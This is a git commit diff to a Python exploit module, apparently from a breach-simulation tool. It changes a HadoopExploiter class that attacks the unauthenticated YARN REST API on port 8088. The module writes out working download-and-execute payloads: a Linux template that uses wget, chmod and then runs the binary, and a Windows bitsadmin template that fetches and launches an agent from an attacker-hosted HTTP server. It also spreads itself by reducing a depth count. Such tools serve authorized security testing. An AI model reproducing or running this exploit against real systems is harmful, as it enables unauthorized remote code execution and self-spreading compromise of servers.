Final tests, windows command changed

This commit is contained in:
Vakaris 2018-08-03 18:28:02 +03:00
parent c7952dcbc5
commit 390d94a8c3
2 changed files with 14 additions and 12 deletions

View File

@ -12,15 +12,15 @@ from exploit.web_rce import WebRCE
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath import posixpath
from threading import Lock from threading import Lock
from model import DROPPER_ARG, DOWNLOAD_TIMEOUT from model import MONKEY_ARG
__author__ = 'VakarisZ' __author__ = 'VakarisZ'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE): class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
# TODO add more hadoop ports
HADOOP_PORTS = [["8088", False]] HADOOP_PORTS = [["8088", False]]
# We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
@ -29,8 +29,10 @@ class HadoopExploiter(WebRCE):
"&& wget -O %(monkey_path)s %(http_path)s " \ "&& wget -O %(monkey_path)s %(http_path)s " \
"; chmod +x %(monkey_path)s " \ "; chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s" "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \ WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s" " Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
DOWNLOAD_TIMEOUT = 90
LOCK = Lock() LOCK = Lock()
def __init__(self, host): def __init__(self, host):
@ -64,18 +66,17 @@ class HadoopExploiter(WebRCE):
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path) monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
if 'linux' in self.host.os['type']: if 'linux' in self.host.os['type']:
command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path, command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd} "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
else: else:
command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path, command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd} "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
# command = "! [ -f %(monkey_path)s ] wget -O %(monkey_path)s %(http_path)s" % {"monkey_path": path, "http_path": http_path}
if not path: if not path:
return False return False
if not self.exploit(url, command): if not self.exploit(exploitable_url, command):
return False return False
self.LOCK.release() self.LOCK.release()
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
return True return True
@ -102,7 +103,8 @@ class HadoopExploiter(WebRCE):
else: else:
return False return False
def try_exploit(self, url): @staticmethod
def try_exploit(url):
# Get the newly created application id # Get the newly created application id
try: try:
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application")) resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
@ -111,4 +113,4 @@ class HadoopExploiter(WebRCE):
if resp.status_code == 200: if resp.status_code == 200:
return True return True
else: else:
return False return False

View File

@ -179,7 +179,7 @@ class HTTPServer(threading.Thread):
self._stopped = True self._stopped = True
def stop(self, timeout=60): def stop(self, timeout=5):
self._stopped = True self._stopped = True
self.join(timeout) self.join(timeout)